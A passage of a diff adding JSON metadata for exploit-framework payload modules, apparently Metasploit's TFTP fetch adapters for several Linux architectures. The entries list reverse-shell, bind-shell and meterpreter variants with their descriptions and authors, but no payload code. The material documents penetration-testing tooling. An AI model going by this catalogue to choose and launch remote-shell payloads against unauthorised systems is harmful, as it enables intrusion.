", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/meterpreter", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + 
"description": "Fetch and execute an MIPSLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/reboot": { + "name": "TFTP Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/tftp/mipsle/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + 
"author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/reboot", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/mipsle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": 
"cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/shell", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/tftp/mipsle/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/mipsle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/mipsle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 
+0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/ppc/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:03 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/ppc/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:03 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/ppc/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:03 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/ppc64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from a TFTP 
server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:08 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64", + "adapted_refname": "linux/ppc64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64/shell_find_port": { + "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/tftp/ppc64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from a TFTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:08 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64", + "adapted_refname": "linux/ppc64/shell_find_port", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/ppc64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": 
null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:08 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64", + "adapted_refname": "linux/ppc64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_https": { 
+ "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64le", + 
"adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/exec": { + "name": "TFTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/tftp/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "Geyslan G. Bem " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/exec", + "staged": false + }, + "payload_cmd/linux/tftp/x64/meterpreter/bind_tcp": { + "name": "TFTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "ricky" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 
8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/tftp/x64/meterpreter/reverse_sctp": { + "name": "TFTP Fetch, Reverse SCTP Stager", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_cmd/linux/tftp/x64/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", 
+ "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/tftp/x64/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/x64/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + 
"rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/x64/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/pingback_bind_tcp": { + "name": "TFTP Fetch, Linux x64 Pingback, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/x64/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nAccept a connection from 
attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/pingback_reverse_tcp": { + "name": "TFTP Fetch, Linux x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/shell/bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + 
"Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/tftp/x64/shell/reverse_sctp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse SCTP Stager", + "fullname": "payload/cmd/linux/tftp/x64/shell/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": 
"linux/x64/reverse_sctp" + }, + "payload_cmd/linux/tftp/x64/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/tftp/x64/shell_bind_ipv6_tcp": { + "name": "TFTP Fetch, 